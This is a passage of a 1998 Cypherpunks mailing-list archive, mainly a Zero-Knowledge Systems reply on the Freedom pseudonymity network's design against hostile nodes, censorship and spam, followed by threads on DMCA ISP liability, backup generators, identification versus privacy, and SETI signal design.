allows more advanced users to built custom routing profiles that they
can associate with a particular pseudonym or with particular
destination sites.  (i.e. Whenever I browse 'www.playboy.com' use
pseudonym 'playboyfan' and routing profile 'Fast routing, no rules
except exit hop cannot be in the following Muslim countries').




>
>2) It is very possible government spy agencies will secretly arrange
>for spy friendly ISP's to obtain your software and setup FREEDOM
>servers in their nation. Then, they could write or modify code to
>intercept and decrypt incoming packets of data BEFORE it hit the
>FREEDOM servers.   Can you write secret "test" code or test packets
>such that you can send out packets from your Canadian headquarters to
>test all FREEDOM servers deployed worldwide to detect all forms of
>tampering, and if detected, send emergency emails and post on
>newgroups the violators ?
>
This is essentially the hostile root/hostile node attack.   Ultimately
we have decided that protecting against a hostile root or node is
infeasible.   (i.e. Whatever attempts we make to make it impossible to
have a hostile node, do not justify themselves because they are not
completely effective)   We do employ some simple protections to try
and avoid amateur hostile nodes (Valid binary checking, periodic
unannounced audits for nodes) but a sophisticated and well financed
attacker could and most likely will operate a number of nodes in the
network.    To compromise the identity behind a pseudonym, an attacker
would have to control or collude with all the nodes you use in a
particular AnonymousIP route.    Since a user by default uses three
hops, and can configure specific nodes that they trust this reduces
the possibility of a single node or a groups of nodes being able to
work to compromise a pseudonyms privacy.

(i.e. If you decide based on reputation to trust Zero-Knowledge, you
might enter into your preferences to always use at least one
Zero-Knowledge server in your AnonymousIP routers.   This means that
as long as that Zero-Knowledge server does not have a hostile root or
that we have not been subverted that your identity is protected.   You
may choose to chain trusted servers (i.e. Use Zero-Knowledge, TOAD.COM
and EFF.ORG servers (TOAD.COM; EFF.ORG are just examples - They are
not to imply that they are currently committed to operate Freedom
nodes) for all my anonymous routes.)

Also because Freedom node operators are rewarded financially to
operate Freedom nodes, we've found incredible interest in the ISP
community to operate Freedom nodes.   This will help to increase the
total number of Freedom nodes in the network, making it that much
harder for a hostile attacker to operate a large percentage of nodes
in the network.  (i.e. 'If there are only 10 nodes in the network,
running 40% of them is quite easy.   If there are 700 nodes in the
network and a user only needs 3 of them, owning enough of those 700
nodes to have a reasonable chance at always being all 3 hops is less
likely.)




>3) Curiously, what if Canadian legislators / politicians create laws
>similar to what the Dutch parliment enacted recently ? Would you move
>your entire company to another nation ? Or, would you have to move
the
>FREEDOM net server headquarters to another nation ? It seems very
>important initially to setup FREEDOM servers in as many nations as
>possible to counteract such attempts to destroy the right to internet
>privacy.

Canada has proven quite committed to the privacy of its citizens and
has demonstrated its support for Canada's growing cryptography
industries.  Many leading cryptography companies are now setup in
Canada and able to export strong cryptography without restriction.  
We believe that Canada will remain a friendly country in which to
develop our products and distribute them around the world.

In the event that the US or another country were able to convince
Canada to ban anonymity/pseudonymity online; or make it illegal to
provide these services there are plans and provisions we have made to
ensure we are able to continue to provide service to our customers.   
Because of the distributed nature of the system, it would take a
global effort among all countries to ban and make Freedom illegal (A
nice soundbyte waiting to happen ;)

The US would have a difficult time (According to our lawyers) passing
a law making anonymity/pseudonymity illegal or banning the domestic
use of encryption products like Freedom.    Ultimately this will be
another example of 'the cats out of the bag'.   There will most likely
be some fights because this will be the first time that completely
pseudonymous digital identities will be accessible to the layman; or
average Internet user - and the technical sophistication of
AnonymousIP with pseudonymous identities mapped on top will pose a
serious challenge for some government initiatives.    But we will be
attempting to educate law enforcement; government officials that this
tool will be the primary and most effective way of protecting children
online (From stalkers and aggressive marketing profiles); protecting
privacy (Both archived histories that we cannot separate ourselves
from; multiple roles we have that are difficult to separate online
right now and privacy from aggressive marketing) and protecting free
speech and human rights on a global level.

For this education process to be effective, we will need to help
government understand that there are better ways of using traditional
law enforcement techniques to accomplish their goals.   This is the
same process that many of the cypherpunks; privacy advocacy groups and
lobbyists have already been doing and we will work on supporting those
efforts.

Initially we will have servers deployed in MANY countries and we have
an aggressive marketing plan to ensure that we have high penetration
of servers very quickly after we release.


>
>4) I urge you to try and think ahead, designing as many
>countermeasures as possible into the first initial version of client
>software, making it as easy as possible for users to circumvent any
>harmful measures taken by the evil forces of the dark side.

We have designed the system to be as versatile as possible and as hard
to shut down as possible.   We have included provisions (Might not be
in version 1, but can be applied very quickly after) to circumvent
country level firewalls or proxy servers so that countries that
attempt to ban all IP traffic to the Freedom network will encounter
many difficulties.   While this is not likely in most North American
or European countries (Although the US many attempt it when they
implement ISP blocking provisions for offshore gambling sites (Online
Gambling Act)and realize that Freedom clients can bypass ISP political
filtering of sites) in certain other countries around the world, the
initial reaction will be to ban Freedom and add it to a list of
filtered sites.    Since some of these countries are the ones that
have citizens who in the most urgent need of unlimited access to Free
Speech, total privacy for their browsing and online activities and the
ability to communicate secretly - we've made it very difficult for any
country to ban our traffic.



>
>5) A PARADOX awaits - Serious privacy advocates will want to "test"
>your system. One such test would be to sign up and operate as as a
>spammer, and use your system to pass on SPAM, or what about malicious
>hackers ? If that person is identified or revealed by you, then your
>system has been revealed as not a true anonymous system, and there
>will be a media feeding frenzy exposing it. But if it IS a truely
>anonymous system, you will have no way to identify and locate
spammers
>or malicious hackers.

The SPAM dilemma was one of the more difficult ones that we faced in
designing the project.   We were aware that if we could not manage the
abuse (Spam, harassment, Anonymous hack attempts) then we would
quickly become 'blackballed' for most services and a few bad apples
could affect all of our legitimate users.    We could not have the
option of knowing who to hold responsible for abuse because that would
include our holding some sort of identity escrow which we specifically
did not want and designed the system to make impossible.   The
alternative we decided on was to invest significantly on making abuse
easier through other networks than the Freedom network.   Some of the
ways we've accomplished this;

- -Designed the entire system around untraceable pseudonymity as opposed
to anonymity.

	This re-enforces the reputation capital aspect of having a pseudonym.
  In general we hope this will promote people who have made an
investment in a pseudonym (Both in time, and money) to be careful
about how badly the affect the online reputation of that pseudonym.

- -Associated a direct cost with a pseudonym

	By having a cost associated with a pseudonym, many people who would
normally take liberties in abusing Internet communication will/do
hesitate, since there is the potential of losing that financial
investment.


- -Forcing 'nymserver' like features of having all outgoing e-mail pass
through the Freedom server, signed by both the pseudonym and the
Freedom network key to avoid forged spam baiting mail.

- -Allowing end users to have destination blocking per recipient and
making it easy for them to request not to receive e-mail from a
particular pseudonym.  (In cases of harassment)

- -Developing sophisticated SPAM blocking systems to make our network
VERY VERY unfriendly to pseudonyms attempting to send SPAM.  (i.e. Max
per day recipients limits of 500 or so people; with the limit
automatically adjusting to deal with averages of all pseudonyms and
number of confirmed spam complaints.)   Bulk mailers will have the
option of purchasing a more expensive pseudonym that removes any daily
limits for recipients but has strict cancellation policies for
unsolicited spam (This enables an underground Zine that publishes
anonymously to sent out an edition every Friday to 15,000 people; but
if someone buys one of the bulk mailing pseudonyms (Around $500+/year)
and abuses by sending a massive SPAM we will confirm the spam
complaints (Based on digital sig on headers and message) and then have
the right to cancel the pseudonyms (Resulting in the Spammer paying
$500+ to deliver one spam to many people then losing that pseudonym.) 
 This makes it cheaper to SPAM from other free services or open mail
relay systems thereby diverting hard core spammers from making the
Freedom network their home.

- -Anonymous Telnet host blocking (Site administrators can work with us
to block anonymous telnet to their sites) allowing certain sites such
as MUDs and Telnet BBS's to allow access but corporate/university
sites to restrict access for anonymous telnet.



We hope with these and other systems we have taken the time to develop
it will help mitigate or reduce the potential of a few malicious users
to harm the legitimate Freedom users.    Ultimately we have only once
choice in dealing with abuse, canceling the pseudonym which will cause
a financial loss for someone as well as killing that 'nym and any
reputation it has gathered.    The terms under which we will cancel a
pseudonym will be very clearly posted, and the only other time is when
a government agency (Canadian) issues us a court order to turn off a
pseudonym.    There is NO MEANS possible for us to reveal the identity
of a user (Thereby avoiding some of the Penet.Fi style attacks).






>
>6) It seems unfortunate that some of the larger, "holier than thou,
>self righteous" worldwide ISP's (like AOL) will be frustrated at
>FREEDOM net not being able to identify who the spammers or hackers
>are, and then BLOCK    FREEDOM net packets from going through their
>servers, starting little electronic wars. These "blocking wars" have
>already occured from time to time.


Hopefully with the abuse management tools we've made available we will
cut off any attempts to block or ban our service.    If certain
domains/admins feel they still wish to ban Freedom traffic we would
work with them to address whatever concerns we can to help restore
good routing relations, but in the end it will be up to our users to
fight for FREEDOM, if anyone attempts to take it away.    Strong
letter writing campaigns, boycotts and media attention should all help
pressure certain organizations to deal with us on any complaints or
issues they have and not treat pseudonyms as second class online
citizens.

Ultimately this service and peoples pseudonymous digital identities
will be as valuable as they make them.   By using them frequently,
lobbying sites to support pseudonymous identities (For instance for
one click authentication and login to web sites), and making sure the
get ALL their friends to use pseudonyms then it becomes REALLY
difficult to shut the service down or silence millions of users.

If there is a small uptake and we only have 100,000 pseudonyms it
would be possible to shut the service down without a lot of noise
(We'll make as much as we can, but ultimately our users have to help).
  With 12 million pseudonyms registered and all of them making as much
noise as possible to fight any attempts to ban Freedom, there will by
a lot more chance of making Freedom completely ubiquitous.

>
>7) It would really be useful for your staff to address questions/
>concerns like these and others by creating pages regarding these
>matters on your website.

Hopefully, you are on some of the lists that I am responding to your
e-mail with.   Most of this information will be posted in time to our
web site, but the FAQ's and whitepapers describing most of this are
not ready for publication on the web yet.

>
>
>Anonymously Yours,
>
>P.S. I will only feel comfortable revealing my anonymous self to you
>by way of my psuedonym, when I sign up with your service, which I
hope
>to do as soon as FREEDOM net is ready.
>
>

Thanks for the interest and comments.   I hope I've been able to
answer most of your questions.




________________________________________________________________________
_
Austin Hill                                   Zero-Knowledge Systems
Inc.
President                                                Montreal,
Quebec
Phone: 514.286.2636 Ext. 226                            Fax:
514.286.2755
E-mail: austin@zks.net                                
http://www.zks.net

             Zero Knowledge Systems Inc. - Nothing Personal
			Changing the world with Zero Knowledge

PGP Fingerprints
2.6.3i = 3F 42 A2 0D AF 78 20 ED  A2 BB AD BE 8B 40 5E 64
5.5.3i = 77 1E 62 21 B3 F0 EB C0  AA 6C 65 30 56 CA BA C4 94 26 EC 00
keys available at 
http://www.nai.com/products/security/public_keys/pub_key_default.asp

________________________________________________________________________
_ 


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

iQA/AwUBNkS3qlbKusSUJuwAEQJzNACg7TTSDuipjmCrT78WMWKskdOkzgQAnAnq
R4ka2Ne+CMK4FmyAt6qfExJu
=paSA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Sun, 8 Nov 1998 09:42:46 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: ISPs now responsible for Pirated Material
In-Reply-To: <v04020a2eb268a6363cdb@[139.167.130.246]>
Message-ID: <v04003a00b26aa0e6e5c5@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Fri, 06 Nov 1998 07:29:38 -0500
>To: general@la-ma.org
>From: Doug Krick <dkrick@bbnplanet.com>
>Subject: ISPs now responsible for Pirated Material
>Mime-Version: 1.0
>Sender: owner-general@la-ma.org
>Precedence: bulk
>
>http://www.news.com/News/Item/0,4,28357,00.html?st.ne.fd.mdh
>
>Summary:  IF a local ISP doesn't register with the goverment, per a new law
>Clinton signed this week, the ISP can be held legally responsible for any
>pirated material that may be on their site.

Not really a problem. Its one thing to require a contact person. It's quite
another to get an ISP to provide sufficient resources to adequately police
its feed. In many of the Usenet .warez. groups, for example, postings
expire after only a few hours/days. By the time action is taken its gone
anyway.

The ISPs made a very good argument, in the SC CDA hearings, that policing
their feeds and access was impractical. Sounds like this could be pretty
much the same problem.

I wonder how Eternity servers, using Usenet references, would be treated
under these regs?

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 8 Nov 1998 11:41:31 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Electric power generators ?
In-Reply-To: <slrn749na2.vtm.igor@manifold.algebra.com>
Message-ID: <v03130302b26aa5be4c10@[209.66.101.228]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:52 PM -0800 11/7/98, Igor Chudov @ home wrote:

>1) Aside from probably lower power, are those cheaper generators somehow
>worse?
>
>2) How reliable are those cheaper generators?
>
>3) What is their expected lifetime, in hours of operation?
>
>4) How hard is it to service them?

The answer to all of the above is that the nickname for Briggs and Stratton
engines, the ones commonly found in the $500 generators sold  by local
hardware and home supply stores, is "Breaks and Scrap 'Em."

Coleman and Generac generators are notorious for short running life. See
misc.survivalism for many comments, including comments by equipment rental
folks, who say the Coleman, Generac, and other B & S or Tecumseh-based
generators have low lifetimes.

If one's need is for very short-term, occasional use, the B & S-based
generators are OK. Cheap, that's for sure.

Better engines are Honda and Kohler (and a few of the Coleman generators
are now starting to feature Honda overhead valve (OHV) engines.

Again, look to misc.survivalism, not the Cypherpunks list!

>5) How do you connect them to the electric system, to properly use
>them as backup? (this may be a stupid question, but I am not very
>familiar with American system of electric wiring).

See above. Also, use the Web.

>6) How much gasoline do they consume if you draw 2KW power from them?
>

My Honda 2.5 KW generator is rated at consuming one third of a gallon per
hour. A 3-gallon tank running for 9 hours. I haven't done exhaustive tests,
but this is, so far, about what I am seeing.

All of this is contained in manfacturers specs, available on the Web and
commented upon in groups like misc.survivalism.

Cypherpunks is not a good place to ask.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Igor Chudov @ home" <ichudov@Algebra.COM>
Date: Sun, 8 Nov 1998 08:18:39 +0800
To: cypherpunks@manifold.algebra.com
Subject: Electric power generators ?
Message-ID: <slrn749na2.vtm.igor@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text/plain




Hi there,

I saw an article posted about "shortages" of electric power generators
and other Y2K "survival" goods, such as grains in airtight drums. My
reading of the article gave me a feel that those products are bullshit
products geared towards naive losers, and can be easily replaced with
much cheaper products that can be bought at discount stores.

More careful reading of the article showed that only certain high power
diesel generators are scarce.

A visit to my local discount retailer has shown that there are 10KW
gasoline generators available for as little as $500. 10KW is far more 
than I would need in an emergency. (I will probably need about 2KW).

Questions:

1) Aside from probably lower power, are those cheaper generators somehow
worse?

2) How reliable are those cheaper generators?

3) What is their expected lifetime, in hours of operation?

4) How hard is it to service them?

5) How do you connect them to the electric system, to properly use
them as backup? (this may be a stupid question, but I am not very 
familiar with American system of electric wiring).

6) How much gasoline do they consume if you draw 2KW power from them?

Thank you.

----------------------------------------------------------------------------
char*p="char*p=%c%s%c;main(){printf(p,34,p,34);}";main(){printf(p,34,p,34);}

                \=/,         _-===-_-====-_-===-_-==========-_-====-_
                |  @___oo   (                                        )_
      /\  /\   / (___,,,}_--=                                          )
     ) /^\) ^\/ _)        =__       Anything is good and useful if    )
     )   /^\/   _)          (_                                        )
     )   _ /  / _)            (         it's made of chocolate.        )
 /\  )/\/ ||  | )_)            (_                                     )
<  >      |(,,) )__)             (   http://www.algebra.com/~ichudov   )
 ||      /    \)___)\             (_                                  _)
 | \____(      )___) )___           -==-_____-=====-_____-=====-___==
  \______(_______;;; __;;;




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Watts <davidwatts_98@yahoo.com>
Date: Sun, 8 Nov 1998 10:48:30 +0800
To: cypherpunks@Algebra.COM
Subject: Re: A question about the new ISP ruling and email...
Message-ID: <19981108022534.28767.rocketmail@send101.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



Here's the definition of ISP in the legislation (H.R. 2281 at
http://thomas.loc.gov).

`(1) SERVICE PROVIDER- (A) As used in subsection (a), the term
`service provider' means an entity offering   the transmission,
routing, or providing of connections for digital online
communications, between or among points specified by a user, of
material of the user's choosing, without modification to the content
of the material as sent or received.

   `(B) As used in this section, other than subsection (a), the term
`service provider' means a provider of online services or network
access, or the operator of facilities therefor, and includes an entity
described in subparagraph (A).

Subsection (a) deals with limiting ISP liability for transmitting
infringing material.  Other subsections deal with caching, hosting,
linking, taking down infringing material, liability for those who
knowingly misrepresent that material is infringing, and rights of
copyright owners to subpoena ISPs for identification information of
alleged infringers.  The requirement to register with the Copyright
Office and designate a contact person applies only as to liability for
hosted material.  However, in order to be eligible for any of the
liability limitations, ISPs must meet the following conditions:

  `(i) CONDITIONS FOR ELIGIBILITY-

          `(1) ACCOMMODATION OF TECHNOLOGY- The limitations on
liability established by this section shall apply to a service
provider only if the service provider--

       `(A) has adopted and reasonably implemented, and informs
subscribers and account holders of the service provider's system or
network of, a policy that provides for the termination in appropriate
circumstances of
subscribers and account holders of the service provider's system or
network who are repeat infringers; and

       `(B) accommodates and does not interfere with standard
technical measures.

          `(2) DEFINITION- As used in this subsection, the term
`standard technical measures' means technical measures that are used
by copyright owners to identify or protect copyrighted works and--

     `(A) have been developed pursuant to a broad consensus of
copyright owners and service providers in an open, fair, voluntary,
multi-industry standards process;

    `(B) are available to any person on reasonable and
nondiscriminatory terms; and

   `(C) do not impose substantial costs on service providers or
substantial burdens on their systems or
networks.   


---phelix@vallnet.com wrote:
>
> On 7 Nov 1998 13:50:20 -0600, Jim Choate <ravage@EINSTEIN.ssz.com>
wrote:
> 
> >
> >Would such a commercial entity require registry to be protected?
> 
> A more interesting question is whether anonymous remailers will need
to
> register.  I suspect that there will be a challenge to this law that
will
> lead judges to define what an ISP is.  That definition will
problably be
> something like:
> 
> 	Any service that allows users to connect to, send, or receive
> information to/from other sites or any site acting as a conduit for
users
> to communicate with others.
> 
> Already, companies like Newscene and Newsguy (usenet only services)
believe
> that they will need to register, though they aren't technically
ISPs, as
> most people would think of them.
> 
> Is an anymous remailer needs to register, what will the implications
be?
> 
> -- Phelix
> 
> 

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: b!X <bix@geekforce.org>
Date: Sun, 8 Nov 1998 10:48:30 +0800
To: cypherpunks@Algebra.COM
Subject: Re: A question about the new ISP ruling and email...
In-Reply-To: <3646ba82.49389892@news>
Message-ID: <Pine.LNX.3.93.981107182855.19710A-100000@millennium-cafe.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 7 Nov 1998 phelix@vallnet.com wrote:

> Is an anymous remailer needs to register, what will the implications be?

Ok, if there's been a URL posted explaining what the law says about
registration, I missed it.

Being an owner of a cybercafe, I imagine I should see what the law has to
say.

- b!X (Guerrilla Techno-fetishist @ GEEK Force)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 8 Nov 1998 09:42:59 +0800
To: cypherpunks@cyberpass.net
Subject: Re: [E-CARM] Identification and Privacy are not Antinomies
Message-ID: <v04020a5db26aa1c14e8d@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Authentication-Warning: c3po.kc-inc.net: majordomo set sender to
owner-e-carm@lists.kc-inc.net using -f
Date: Sat, 7 Nov 1998 19:52:59 -0200 (EDT)
From: Ed Gerck <egerck@laser.cps.softex.br>
To: Robert Hettinga <rah@shipwright.com>
cc: E-CARM <e-carm@c3po.kc-inc.net>, DIGSIG@LISTSERV.TEMPLE.EDU
Subject: Re: [E-CARM] Identification and Privacy are not Antinomies
MIME-Version: 1.0
Sender: owner-e-carm@c3po.kc-inc.net
Precedence: bulk

On Sat, 7 Nov 1998, Robert Hettinga wrote:

>Don't blame me, blame the remailer? <Bwahahahahah!>

Bob:

If the e-mail below was forwarded through you, it means that you
thought it is useful to these lists and that you also found some
nexus in the argument line used by the, huh... author. However,
neither you nor the huh... author seem to hold a steady line of
argument, as of course, you are indeed to be blamed without recourse
for this piece of tasteless non-sense being further reproduced on the
Net.

My intent with my original posting (available at
http://www.mcg.org.br/antinomy.txt, as proof) was NOT to criticize
the Clinton administration on an initiative which is in accord with
current practices worldwide -- but to show that there is a better and
privacy-protecting solution when identification is modelled using
coherence functions. Further, my intent was to show that biometrics
is perishable and not self-secure, which reasons alone would seem to
rule it out in the case.

THUS, MY SOLE REASON FOR THIS REJOINDER IS TO MAKE THAT CLEAR.

However, the Net is an amplifier -- it just provides raw power. The
question is how it is used. You and I have duly performed our duties
as estimulated emission sources, albeit with different filter
functions.

Cheers,

Ed Gerck.

>
>Cheers,
>Bob Hettinga
>
>--- begin forwarded text
>
>
>Date: Sat, 7 Nov 1998 20:26:24 +0100
>From: Anonymous <nobody@replay.com>
>Comments: This message did not originate from the Sender address above.
>	It was remailed automatically by anonymizing remailer software.
>	Please report problems or inappropriate use to the
>	remailer administrator at <abuse@replay.com>.
>Subject: Identification and Privacy are not Antinomies
>To: cypherpunks@cyberpass.net
>Sender: owner-cypherpunks@cyberpass.net
>Precedence: first-class
>Reply-To: Anonymous <nobody@replay.com>
>X-Loop: cypherpunks@cyberpass.net
>
>Aaww horseplops[1]! In fact, great, festering, mid-path, sole-sticking
>horseplops!  This argument is vacuous. As every small child knows,
>authentication != identification and, in most cases,  only authentication
>is required and, the absence of identification implies privacy.
>
>Am I a UK citizen, a good credit risk, a club member in good
>standing, etc.  An appropriate mechanism, a smartcard, can easily
>authenticate both itself (challenge-response) and the bearer via a biometric
>and/or PIN without revealing the identity of the holder.
>
>However, who holds out hope that such a sensible
>thing would ever be adopted by the powers-that-be.
>
>Nematode
>
>[1] The plop is a useful measure of human cogitation. As every small child
>knows, much good thinking is done whilst enthroned on the commode, since
>the evacuation of feces from the anus promotes the introduction of fresh
>material into the brain through the ears.  After years of experimentation
>and careful measurement, we (the ISO labs) have observed a strong  correlation
>between ideas and fecal bombardment of the receptive commodal pool and audible
>emissions therefrom. For example, it required only 0.3 plops to decide to vote
>for Clinton while a similar decision in favor of John Major required almost
>5 plops.
>For the purposes of comparison, 10^6 homosapiens plop = 1 horseplop. While the
>relationship between megaplops, flops and MIPS is not yet clear, our
>ISO plop standard should be emitted soon.
>
>-----BEGIN PLOP SIGNATURE-----
>Version: PLOP for Personal Privacy
>Charset: nocommode
>
>NSACIAMOUSEaw6mkJhRWnHTzAQFMlgP/ZMM+14qUzy+w6AGSlOtAyrE2BBDSV3Hm
>Tlc0Ct7wyXV2CPEMzieCm4ZS0rzigkgTZTMCmEqYexEJkdSAU60WMHm3cr28UJIG
>ekx7N7aWKQ34u05dRrE+IVR329y0ia/2F8B7edZ7CqoydOJAnQxNIB1qohlCGlGT
>RYgOGVSpO04=
>=MF1K
>-----END PLOP SIGNATURE-----
>
>--- end forwarded text
>
>
>-----------------
>Robert A. Hettinga <mailto: rah@philodox.com>
>Philodox Financial Technology Evangelism <http://www.philodox.com/>
>44 Farquhar Street, Boston, MA 02131 USA
>"... however it may deserve respect for its usefulness and antiquity,
>[predicting the end of the world] has not been found agreeable to
>experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
>===========================================================================
>Help with Majordomo commands plus list archives and information is
>available through the E-CARM web page at http://www.kc-inc.net/e-carm/.
>Sponsored by The Knowledge Connection.
>===========================================================================
>

______________________________________________________________________
Dr.rer.nat. E. Gerck                     egerck@novaware.cps.softex.br
http://novaware.cps.softex.br

===========================================================================
Help with Majordomo commands plus list archives and information is
available through the E-CARM web page at http://www.kc-inc.net/e-carm/.
Sponsored by The Knowledge Connection.
===========================================================================

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 8 Nov 1998 03:49:42 +0800
To: cypherpunks@cyberpass.net
Subject: Identification and Privacy are not Antinomies
Message-ID: <199811071926.UAA19456@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Aaww horseplops[1]! In fact, great, festering, mid-path, sole-sticking
horseplops!  This argument is vacuous. As every small child knows, 
authentication != identification and, in most cases,  only authentication 
is required and, the absence of identification implies privacy.

Am I a UK citizen, a good credit risk, a club member in good
standing, etc.  An appropriate mechanism, a smartcard, can easily 
authenticate both itself (challenge-response) and the bearer via a biometric 
and/or PIN without revealing the identity of the holder.

However, who holds out hope that such a sensible
thing would ever be adopted by the powers-that-be.

Nematode

[1] The plop is a useful measure of human cogitation. As every small child
knows, much good thinking is done whilst enthroned on the commode, since 
the evacuation of feces from the anus promotes the introduction of fresh 
material into the brain through the ears.  After years of experimentation
and careful measurement, we (the ISO labs) have observed a strong  correlation
between ideas and fecal bombardment of the receptive commodal pool and audible
emissions therefrom. For example, it required only 0.3 plops to decide to vote
for Clinton while a similar decision in favor of John Major required almost 5 plops.
For the purposes of comparison, 10^6 homosapiens plop = 1 horseplop. While the
relationship between megaplops, flops and MIPS is not yet clear, our
ISO plop standard should be emitted soon.

-----BEGIN PLOP SIGNATURE-----
Version: PLOP for Personal Privacy
Charset: nocommode

NSACIAMOUSEaw6mkJhRWnHTzAQFMlgP/ZMM+14qUzy+w6AGSlOtAyrE2BBDSV3Hm
Tlc0Ct7wyXV2CPEMzieCm4ZS0rzigkgTZTMCmEqYexEJkdSAU60WMHm3cr28UJIG
ekx7N7aWKQ34u05dRrE+IVR329y0ia/2F8B7edZ7CqoydOJAnQxNIB1qohlCGlGT
RYgOGVSpO04=
=MF1K
-----END PLOP SIGNATURE-----        




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Sun, 8 Nov 1998 12:57:00 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: IP: Discover Alien Life With Your PC And SETI
In-Reply-To: <199811072128.NAA19768@netcom13.netcom.com>
Message-ID: <v04003a03b26ac9032df6@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/plain



Perhaps I'm missing something, but it seems to me that if I were an alien
civilization and wanted to send out a beacon, in as wide an angle as
possible, across the vast reaches of space and overcome as much of the path
losses as possible using the least energy I certainly wouldn't use a narrow
band signal. Quite the contrary, I'd want to spread a low bandwidth
information signal across the widest practical spectrum. Its much easier to
increase process gain (the ratio of the baseband information signal to the
final carrier bandwidth) than transmit power.

While a narrow band signal from Arecibo's powerful transmitter/antenna
combination can be detected at a distance of about 300 light years. It
subtends a very small angle greatly reducing the likelyhood of contact.
Switching to a spread spectrum approach could allow broadening the antenna
pattern, and thereby its chances of detection, significantly without
reducing its effective range. Notice how 63 dB (or over 2,000,000 fold
effective increase in transmit power) of process gain enables handheld GPS
receivers to pull in signals from satellites, sent using only a few watts
of transmit power, without much of an antenna.

If all this seems to make sense, then why are the SETI people apparently
seaching the skies with lots of narrow band receivers? They don't seem to
be employing any broadband correlator techniques, so spread signals will
probably be missed.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phelix@vallnet.com
Date: Sun, 8 Nov 1998 05:52:59 +0800
To: cypherpunks@Algebra.COM
Subject: Re: A question about the new ISP ruling and email...
In-Reply-To: <199811071757.LAA02280@einstein.ssz.com>
Message-ID: <3646ba82.49389892@news>
MIME-Version: 1.0
Content-Type: text/plain



On 7 Nov 1998 13:50:20 -0600, Jim Choate <ravage@EINSTEIN.ssz.com> wrote:

>
>Would such a commercial entity require registry to be protected?

A more interesting question is whether anonymous remailers will need to
register.  I suspect that there will be a challenge to this law that will
lead judges to define what an ISP is.  That definition will problably be
something like:

	Any service that allows users to connect to, send, or receive
information to/from other sites or any site acting as a conduit for users
to communicate with others.

Already, companies like Newscene and Newsguy (usenet only services) believe
that they will need to register, though they aren't technically ISPs, as
most people would think of them.

Is an anymous remailer needs to register, what will the implications be?

-- Phelix




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 8 Nov 1998 12:33:34 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: A question about the new ISP ruling and email... (fwd)
Message-ID: <199811080408.WAA04069@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 7 Nov 1998 18:25:34 -0800 (PST)
> From: David Watts <davidwatts_98@yahoo.com>
> Subject: Re: A question about the new ISP ruling and email...

> `(1) SERVICE PROVIDER- (A) As used in subsection (a), the term
> `service provider' means an entity offering   the transmission,
> routing, or providing of connections for digital online
> communications, between or among points specified by a user, of
> material of the user's choosing, without modification to the content
> of the material as sent or received.
> 
>    `(B) As used in this section, other than subsection (a), the term
> `service provider' means a provider of online services or network
> access, or the operator of facilities therefor, and includes an entity
> described in subparagraph (A).

That pretty much covers anyone other than a end-user/subscriber. This means
anonymous remailers, mailing list hosting services, email services, etc.

> Subsection (a) deals with limiting ISP liability for transmitting
> infringing material.  Other subsections deal with caching, hosting,
> linking, taking down infringing material, liability for those who
> knowingly misrepresent that material is infringing, and rights of
> copyright owners to subpoena ISPs for identification information of
> alleged infringers.  The requirement to register with the Copyright
> Office and designate a contact person applies only as to liability for
> hosted material.

Does 'hosted material' mean material that is put up by the ISP itself or
does it also include material made available by subscribers?

> However, in order to be eligible for any of the
> liability limitations, ISPs must meet the following conditions:

Ah, so there's more than simple registration...

>   `(i) CONDITIONS FOR ELIGIBILITY-
> 
>           `(1) ACCOMMODATION OF TECHNOLOGY- The limitations on
> liability established by this section shall apply to a service
> provider only if the service provider--
> 
>        `(A) has adopted and reasonably implemented, and informs
> subscribers and account holders of the service provider's system or
> network of, a policy that provides for the termination in appropriate
> circumstances of
> subscribers and account holders of the service provider's system or
> network who are repeat infringers; and

Wait a second, I'm no cop. If somebody places copyrighted material on SSZ
for example I can see bringing suite against that party, but forcing me to
